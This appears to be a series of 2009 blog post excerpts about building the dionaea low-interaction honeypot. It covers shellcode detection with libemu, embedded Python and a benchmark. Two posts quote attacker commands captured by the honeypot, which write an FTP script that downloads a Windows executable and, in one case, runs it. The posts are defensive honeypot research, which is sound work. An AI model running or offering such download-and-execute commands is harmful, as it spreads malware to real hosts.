Iteolih: Miles and More

11 Aug 2009 Markus Koetter iteolih
We got a new milestone due: 10.08.2009 thread-pool works stream recording works shellcode detection using libemu works shellcode emulation using libemu works compiles on linux&openbsd An exploit taken from a public repository, run against the software, is detected and emulated. To shorten things, basically all required points are hit with current svn. So, given the time we just saved, some words about how it works. The core functionality in dionaea is written in c, but python is embedded as scripting language and required parts of the c-api are exported to the embedded python, using cython bindings.

Iteolih: malicious ftp services

26 Jul 2009 Markus Koetter iteolih
Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this: WinExec(“cmd /c echo open 4871 > o&echo user 1 1 » o &echo get msq16.exe » o”) ExitThread(0) As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy. I did not expect downloading the malware getting a problem, as all information required was available, including host credentials and filename.

Iteolih: If you can't touch it ...

21 Jul 2009 Markus Koetter ftp iteolih
While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere. cmd /c echo open 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe The offer to download something was not that unexpected, we are working hard to get these offers, so we can grab copies of something, but the location was interesting.

Iteolih: Is this worth your time?

05 Jun 2009 Markus Koetter iteolih
Hello, due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created. I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

Iteolih: Python Benchmark

24 May 2009 Markus Koetter iteolih python
As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The ’testsuite’ is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page. I tested 2.6.2_(release26-maint,_Apr_19_2009,_02:15:38) 3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_ 3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_ To benchmark, I ran the apache benchmark tool ab ab -n 100000 -c 15 http://localhost:8080/bar